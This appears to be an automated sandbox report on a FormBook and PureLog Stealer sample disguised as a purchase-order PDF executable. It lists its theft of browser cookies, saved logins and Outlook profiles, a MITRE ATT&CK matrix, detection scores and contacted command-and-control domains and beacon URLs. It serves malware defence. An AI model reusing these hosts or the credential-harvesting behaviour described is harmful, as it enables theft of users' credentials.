Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 7.2.PO-000172483 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO-000172483 pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3289765947.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3289827592.0000000004810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2611689620.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2612889550.0000000003860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.PO-000172483 pdf.exe.8fb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-000172483 pdf.exe.3dd70b8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-000172483 pdf.exe.3db7098.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-000172483 pdf.exe.8fb0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-000172483 pdf.exe.3db7098.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-000172483 pdf.exe.3dd70b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2090320439.0000000008FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2082693969.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2082693969.0000000003DD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\cttune.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 7.2.PO-000172483 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO-000172483 pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3289765947.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3289827592.0000000004810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2611689620.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2612889550.0000000003860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.PO-000172483 pdf.exe.8fb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-000172483 pdf.exe.3dd70b8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-000172483 pdf.exe.3db7098.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-000172483 pdf.exe.8fb0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-000172483 pdf.exe.3db7098.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-000172483 pdf.exe.3dd70b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2090320439.0000000008FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2082693969.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2082693969.0000000003DD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	11 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	42 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 File Deletion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO-000172483 pdf.exe	39%	Virustotal		Browse
PO-000172483 pdf.exe	53%	ReversingLabs	Win32.Backdoor.FormBook
PO-000172483 pdf.exe	100%	Avira	HEUR/AGEN.1309493
PO-000172483 pdf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://static.loopia.se/responsive/images/iOS-114.png	0%	Avira URL Cloud	safe
http://www.milp.store/2j93/?oVUxTLO=Vzef3oWXaGELtgUQK6WziDhXN2l6Tpk3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt63bn0dOTASaMNZTI5trmrdZ8L/Alw25M+Xf5hGL6nvcNQQ==&9DQxz=BXUp_jixat	0%	Avira URL Cloud	safe
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-72.png	0%	Avira URL Cloud	safe
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	0%	Avira URL Cloud	safe
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	0%	Avira URL Cloud	safe
http://www.jyshe18.buzz	0%	Avira URL Cloud	safe
http://www.jyshe18.buzz/	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/styles/reset.css	0%	Avira URL Cloud	safe
http://www.milp.store/2j93/	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-57.png	0%	Avira URL Cloud	safe
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	0%	Avira URL Cloud	safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	0%	Avira URL Cloud	safe
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	0%	Avira URL Cloud	safe
http://www.tabyscooterrentals.xyz/4wxo/?9DQxz=BXUp_jixat&oVUxTLO=AuCk/wTI7zW3ld/vlF6yH/SnOpsg3Nt9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8npNZet2wbij5DqF2t6l2aiyaCaN+prATVQbgFOC5sVP+ADg==	0%	Avira URL Cloud	safe
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.jyshe18.buzz/1lpi/	0%	Avira URL Cloud	safe
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.jyshe18.buzz	172.67.131.144	true	false	unknown
www.milp.store	194.9.94.85	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.ftaane.net	unknown	unknown	false	unknown
www.vavada-official.buzz	unknown	unknown	false	unknown
www.tabyscooterrentals.xyz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.milp.store/2j93/?oVUxTLO=Vzef3oWXaGELtgUQK6WziDhXN2l6Tpk3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt63bn0dOTASaMNZTI5trmrdZ8L/Alw25M+Xf5hGL6nvcNQQ==&9DQxz=BXUp_jixat	true	Avira URL Cloud: safe	unknown
http://www.milp.store/2j93/	true	Avira URL Cloud: safe	unknown
http://www.tabyscooterrentals.xyz/4wxo/?9DQxz=BXUp_jixat&oVUxTLO=AuCk/wTI7zW3ld/vlF6yH/SnOpsg3Nt9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8npNZet2wbij5DqF2t6l2aiyaCaN+prATVQbgFOC5sVP+ADg==	false	Avira URL Cloud: safe	unknown
http://www.jyshe18.buzz/1lpi/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-114.png	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-72.png	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jyshe18.buzz	ycnUEzgloE.exe, 0000000C.00000002.3289330065.000000000093C000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/styles/reset.css	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jyshe18.buzz/	cttune.exe, 0000000B.00000002.3290803746.0000000005B7C000.00000004.10000000.00040000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.000000000320C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-57.png	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/logo/logo-loopia-white.svg	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO-000172483 pdf.exe, 00000000.00000002.2079293199.000000000295A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/style/2022-extra-pages.css	cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.9.94.85	www.milp.store	Sweden	39570	LOOPIASE	true
172.67.131.144	www.jyshe18.buzz	United States	13335	CLOUDFLARENETUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585888
Start date and time:	2025-01-08 12:47:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
